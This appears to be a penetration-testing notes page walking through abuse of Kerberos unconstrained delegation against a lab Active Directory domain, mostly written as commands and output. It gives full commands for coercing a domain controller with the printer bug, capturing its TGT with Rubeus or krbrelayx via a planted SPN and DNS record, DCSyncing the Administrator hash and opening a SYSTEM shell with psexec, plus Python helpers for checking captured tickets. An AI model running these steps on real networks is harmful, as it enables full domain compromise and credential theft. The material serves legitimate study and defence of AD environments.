Unconstrained Delegation


Last updated 1 year ago

Abuse from Windows System

First we have to compromise a host that is trusted for unconstrained delegation (here the web server WEBSRV01) and obtain local administrator rights on it, because extracting other logon sessions' tickets from LSASS requires elevation.

Verify Print Spooler

PS C:\> dir \\dc01\pipe\spoolss


    Directory: \\dc01\pipe


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
                                                 spoolss

Monitor

If the spoolss pipe is listed, the Print Spooler service is running on DC01 and can be coerced. On WEBSRV01, launch Rubeus from an administrative command prompt; it polls LSASS every 10 seconds and prints only tickets that belong to DC01$, the domain controller's machine account:

C:\Tools>Rubeus.exe monitor /interval:10 /filteruser:DC01$

Printer Bug

From a domain user context, trigger the printer bug: SpoolSample asks DC01 to send a print-change notification to WEBSRV01. Because WEBSRV01 is trusted for unconstrained delegation, DC01$ authenticates to it with a forwarded TGT attached, which lands in WEBSRV01's LSASS and is printed by the Rubeus monitor as base64:

C:\Tools>SpoolSample.exe DC01 WEBSRV01

Pass The Ticket

Rubeus.exe ptt /ticket:doIFIjCCBR6gAwIBBaEDAgEWo...

Import the base64 ticket printed by the monitor into the current logon session. Holding DC01$'s TGT, we can run DCSync (the domain controller's machine account has the replication rights) to dump the krbtgt hash and every other account hash, and from the krbtgt hash craft a golden ticket.

Abuse from Linux System

FindDelegation

Start by listing the accounts trusted for delegation; WEBSRV01$ is expected to appear with the Unconstrained type:

└─$ impacket-findDelegation vulnableone.local/khan.chanthou:Password123

Addspn

We need credentials for the unconstrained delegation machine account, WEBSRV01$: its NTLM hash (LM:NT, as below) or its AES key, dumped from the compromised web server.

Query the SPNs currently set on the account with -q before changing anything:

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local -q dc01.vulnableone.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target

A computer account may only write SPNs whose host part is one of its own names, so HOST/evil.vulnableone.local cannot be added to servicePrincipalName directly. The --additional flag instead adds evil.vulnableone.local to the account's msDS-AdditionalDnsHostName attribute, which the account is allowed to write, and the HOST/evil.vulnableone.local service principal name is registered for the machine account that way:

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local dc01.vulnableone.local --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Verify on the computer object from a Windows host with PowerView:

PS C:\Tools> Get-DomainComputer -Unconstrained | select samaccountname, serviceprincipalname

samaccountname serviceprincipalname
-------------- --------------------
WEBSRV01$       {cifs/evil.vulnableone.local, WSMAN/EVIL, WSMAN/evil.vulnableone.local, TERMSRV/EVIL...}
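Why the direct servicePrincipalName write is refused while --additional succeeds comes down to two validated-write rules the DC applies when an account modifies its own object. The block below is an added example, not code from this page or from krbrelayx, that models those rules in plain Python against a constructed WEBSRV01$ object. It is simplified from MS-ADTS: msDS-AllowedDNSSuffixes and msDS-AdditionalSamAccountName are not handled, and the ComputerObject class, its field names and the function names are assumptions of this example, not AD or tool identifiers.

```python
from __future__ import annotations
from dataclasses import dataclass, field


@dataclass
class ComputerObject:
    """Attributes the DC consults when an account modifies itself (constructed sample, not a live object)."""
    sam_account_name: str
    dns_host_name: str
    additional_dns_host_names: list[str] = field(default_factory=list)
    service_principal_names: list[str] = field(default_factory=list)


def spn_host(spn: str) -> str:
    """Host part of serviceclass/host[:port][/instance], lower-cased; e.g. HTTP/web.x:8080/site -> web.x."""
    parts = spn.split("/")
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN: {spn!r}")
    return parts[1].split(":", 1)[0].lower()


def self_spn_names(obj: ComputerObject) -> set[str]:
    """Host names a computer account may use in SPNs it writes on itself (Validated-SPN rule):
    its dNSHostName, its sAMAccountName without the trailing $, and every msDS-AdditionalDnsHostName."""
    names = {obj.dns_host_name, obj.sam_account_name.rstrip("$"), *obj.additional_dns_host_names}
    return {n.lower() for n in names if n}


def self_spn_write_allowed(obj: ComputerObject, spn: str) -> bool:
    return spn_host(spn) in self_spn_names(obj)


def self_additional_dns_write_allowed(domain_dns_name: str, fqdn: str) -> bool:
    """Validated write to msDS-AdditionalDnsHostName: the name must lie inside the domain's DNS zone.
    Unlike dNSHostName, the host label is not tied to the computer name, so 'evil' is acceptable."""
    name, zone = fqdn.lower().rstrip("."), domain_dns_name.lower().rstrip(".")
    return name.endswith("." + zone) and len(name) > len(zone) + 1


def add_spn(obj: ComputerObject, spn: str) -> None:
    """addspn.py without --additional: the account writes servicePrincipalName on itself."""
    if not self_spn_write_allowed(obj, spn):
        raise PermissionError(f"insufficient rights: {spn} is not a name of {obj.sam_account_name}")
    if spn not in obj.service_principal_names:
        obj.service_principal_names.append(spn)


def add_additional_dns_host_name(obj: ComputerObject, domain_dns_name: str, fqdn: str) -> None:
    """addspn.py with --additional: the account writes msDS-AdditionalDnsHostName instead."""
    if not self_additional_dns_write_allowed(domain_dns_name, fqdn):
        raise PermissionError(f"{fqdn} is outside the {domain_dns_name} zone")
    if fqdn not in obj.additional_dns_host_names:
        obj.additional_dns_host_names.append(fqdn)


if __name__ == "__main__":
    websrv = ComputerObject("WEBSRV01$", "websrv01.vulnableone.local")
    spn = "HOST/evil.vulnableone.local"
    try:
        add_spn(websrv, spn)                                  # refused: evil.* is not one of its names
    except PermissionError as exc:
        print("direct write:", exc)
    add_additional_dns_host_name(websrv, "vulnableone.local", "evil.vulnableone.local")
    add_spn(websrv, spn)                                      # now passes the Validated-SPN check
    print("SPNs after --additional:", websrv.service_principal_names)
```

The practical consequence is visible in the zone check: a name outside the domain's DNS suffix (evil.attacker.net) is refused on both paths, which is why the attacker name has to live under vulnableone.local and needs the dnstool record that follows.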

dnstool

Use dnstool.py to create an AD-integrated DNS record for evil.vulnableone.local pointing at the attacker host (10.10.10.11). Authenticated accounts can add records to the domain zone by default, so the WEBSRV01$ credentials are sufficient:

└─$ python3 dnstool.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -r evil.vulnableone.local -d 10.10.10.11 --action add dc01.vulnableone.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Check that the record resolves by querying the DC's DNS server (10.10.10.10):

└─$ nslookup evil.vulnableone.local 10.10.10.10  
Server:         10.10.10.10 
Address:        10.10.10.10#53

Name:   evil.vulnableone.local
Address: 10.10.10.11

krbrelayx

Start krbrelayx.py with the AES key of the owned computer account (WEBSRV01$), dumped from the compromised web server (not shown on this page); -hashes with its NT hash works too. The key is needed because the service ticket DC01 presents for HOST/evil.vulnableone.local is encrypted with WEBSRV01$'s key, and the forwarded TGT has to be decrypted out of the AP-REQ authenticator. By default SMB, HTTP and DNS listeners are started, and every captured TGT is written to a ccache file (export mode):

└─$ python krbrelayx.py -aesKey 13aa2b4efc4bbab2ec9804cd9c39965ce4a6a6438e2f12ca124c4b75ff47127
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

printerbug

Now coerce DC01 into authenticating to evil.vulnableone.local (which resolves to the krbrelayx listener) with printerbug.py, authenticating as WEBSRV01$ with its hash; any domain account would do for this step:

└─$ python printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f vulnableone.local/WEBSRV01\$@dc01.vulnableone.local evil.vulnableone.local
[*] Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attempting to trigger authentication via rprn RPC at dc01.vulnableone.local
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

The RPC_S_SERVER_UNAVAILABLE error is expected: the DC's callback went to the krbrelayx listener rather than to a real print server. Confirm success in the krbrelayx window, which reports the captured ticket and the ccache file it wrote.

Export Ticket:

krbrelayx writes each captured TGT to a ccache file in its working directory, named after the client and service principals. Point KRB5CCNAME at DC01$'s ticket and confirm it with klist:

└─$ export KRB5CCNAME=./DC01\$@VULNABLEONE.LOCAL_krbtgt@VULNABLEONE.LOCAL.ccache 

└─$ klist                                                                                                                        
Ticket cache: FILE:./DC01$@VULNABLEONE.LOCAL_krbtgt@VULNABLEONE.LOCAL.ccache
Default principal: DC01$@VULNABLEONE.LOCAL

Valid starting       Expires              Service principal
02/25/2024 13:30:16  02/25/2024 23:29:38  krbtgt/VULNABLEONE.LOCAL@VULNABLEONE.LOCAL
        renew until 03/03/2024 13:29:38
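Before spending the captured ticket it is worth checking what actually landed in the ccache: the principal must be DC01$, the service krbtgt, and the ticket forwarded and still forwardable, since a TGT without those flags is useless for this attack. The block below is an added example, not part of this page or of krbrelayx, that parses the MIT ccache file format version 4 with only the Python standard library. Because it must run offline it also serializes a constructed DC01$ credential (dummy key and ticket bytes, times mirroring the klist output above) and reads it back; the builder, the Reader class and the function names are this example's own. A real cache from krbrelayx can be fed to parse_ccache from disk; extra entries some libraries store (e.g. MIT config entries) simply show up as additional credentials.

```python
from __future__ import annotations
import struct
from datetime import datetime, timezone

# Ticket-flag bits as stored in a ccache credential (MIT krb5.h TKT_FLG_*).
TKT_FLAGS = {
    "forwardable": 0x40000000, "forwarded": 0x20000000, "proxiable": 0x10000000,
    "proxy": 0x08000000, "renewable": 0x00800000, "initial": 0x00400000,
    "pre_authent": 0x00200000,
}


def counted(b: bytes) -> bytes:
    """ccache 'counted octet string': big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def principal(realm: str, components: list[str], name_type: int) -> bytes:
    head = struct.pack(">II", name_type, len(components)) + counted(realm.encode())
    return head + b"".join(counted(c.encode()) for c in components)


def build_ccache(client: str, realm: str, service: list[str], key: bytes, ticket: bytes,
                 start: int, end: int, renew_till: int, flags: int) -> bytes:
    """Serialize a one-credential ccache in file format version 4 (only used to build the sample)."""
    header = struct.pack(">HHii", 1, 8, 0, 0)                   # tag 1 = DeltaTime, zero offset
    data = b"\x05\x04" + struct.pack(">H", len(header)) + header
    data += principal(realm, [client], 1)                        # default principal (NT-PRINCIPAL)
    data += principal(realm, [client], 1)                        # credential: client
    data += principal(realm, service, 2)                         # credential: server (NT-SRV-INST)
    data += struct.pack(">H", 18) + counted(key)                 # keyblock: aes256-cts-hmac-sha1 + key
    data += struct.pack(">IIII", start, start, end, renew_till)  # authtime, starttime, endtime, renew_till
    data += b"\x00" + struct.pack(">I", flags)                   # is_skey, ticket_flags
    data += struct.pack(">II", 0, 0)                             # no addresses, no authdata
    return data + counted(ticket) + counted(b"")                 # ticket, second_ticket


class Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:                              # raises on truncation, never pads
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def counted(self): return self.take(self.u32())

    def principal(self) -> str:
        _name_type, n = self.u32(), self.u32()
        realm = self.counted().decode()
        return "/".join(self.counted().decode() for _ in range(n)) + "@" + realm


def parse_ccache(data: bytes) -> dict:
    """Parse a v4 ccache into its default principal and a summary of each credential."""
    r = Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache file format version 4 is handled here")
    r.take(r.u16())                                              # skip the header block
    result = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(r.data):
        client, server = r.principal(), r.principal()
        r.u16(); r.counted()                                     # keyblock: enctype + key (not needed)
        _auth, _start, end, renew_till = (r.u32() for _ in range(4))
        r.u8()                                                   # is_skey
        flags = r.u32()
        for _ in range(r.u32()): r.u16(); r.counted()            # addresses
        for _ in range(r.u32()): r.u16(); r.counted()            # authdata
        r.counted(); r.counted()                                 # ticket, second_ticket
        result["credentials"].append({
            "client": client, "server": server, "is_tgt": server.startswith("krbtgt/"),
            "flags": sorted(name for name, bit in TKT_FLAGS.items() if flags & bit),
            "expires": datetime.fromtimestamp(end, timezone.utc).isoformat(),
            "renew_until": datetime.fromtimestamp(renew_till, timezone.utc).isoformat(),
        })
    return result


def usable_for_unconstrained_delegation(cred: dict) -> bool:
    """What the attack needs: a TGT that was forwarded to us and is itself still forwardable."""
    return cred["is_tgt"] and {"forwardable", "forwarded"} <= set(cred["flags"])


def sample_ccache() -> bytes:
    """Constructed DC01$ TGT mirroring the klist output above; key and ticket bytes are dummies."""
    def ts(*ymdhms): return int(datetime(*ymdhms, tzinfo=timezone.utc).timestamp())
    flags = sum(TKT_FLAGS[f] for f in ("forwardable", "forwarded", "renewable", "pre_authent"))
    return build_ccache("DC01$", "VULNABLEONE.LOCAL", ["krbtgt", "VULNABLEONE.LOCAL"],
                        b"\x11" * 32, b"\x61\x82\x04\x00" + b"\x00" * 16,
                        ts(2024, 2, 25, 13, 30, 16), ts(2024, 2, 25, 23, 29, 38),
                        ts(2024, 3, 3, 13, 29, 38), flags)


if __name__ == "__main__":
    info = parse_ccache(sample_ccache())
    print("default principal:", info["default_principal"])
    for cred in info["credentials"]:
        print(cred, "->", "usable" if usable_for_unconstrained_delegation(cred) else "not usable")
```

Running it on the file named in KRB5CCNAME (open it in binary mode and pass the bytes to parse_ccache) gives the same information as klist plus the ticket flags, which klist only shows with -f; the expiry check matters because a DC machine-account TGT captured this way is good for ten hours and renewable for a week, after which the coercion has to be repeated.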

Impacket-Secretsdump

Use the ticket (-k -no-pass; the principal is read from the ccache) to DCSync the Administrator account from DC01. The target must be the DC's FQDN so the service ticket is requested for the right SPN:

impacket-secretsdump dc01.vulnableone.local -dc-ip 10.10.10.10 -just-dc-user 'vulnableone\administrator' -k -no-pass

Impacket-Psexec

Pass the Administrator NT hash recovered by DCSync to get a SYSTEM shell on the domain controller:

└─$ impacket-psexec vulnableone.local/administrator@dc01.vulnableone.local -hashes aad3b435b51404eeaad3b435b51404ee:a6b922ecd4785badb8b50bc175c10134

Cleanup

Remove SPN

The -r flag removes the value instead of adding it; pass --additional again so the entry is taken out of msDS-AdditionalDnsHostName:

└─$ python addspn.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -s HOST/evil.vulnableone.local -r DC01.vulnableone.local --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Remove DNS Record

Remove the DNS record as well; dnstool tombstones the entry when it is the only record for the name, as the output shows:

└─$ python dnstool.py -u 'vulnableone\WEBSRV01$' -p aad3b435b51404eeaad3b435b51404ee:1347522c7646ca052a87a93caca5ea1f -r evil.vulnableone.local -d 10.10.10.11 --action remove DC01.vulnableone.local      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Target has only one record, tombstoning it
[+] LDAP operation completed successfully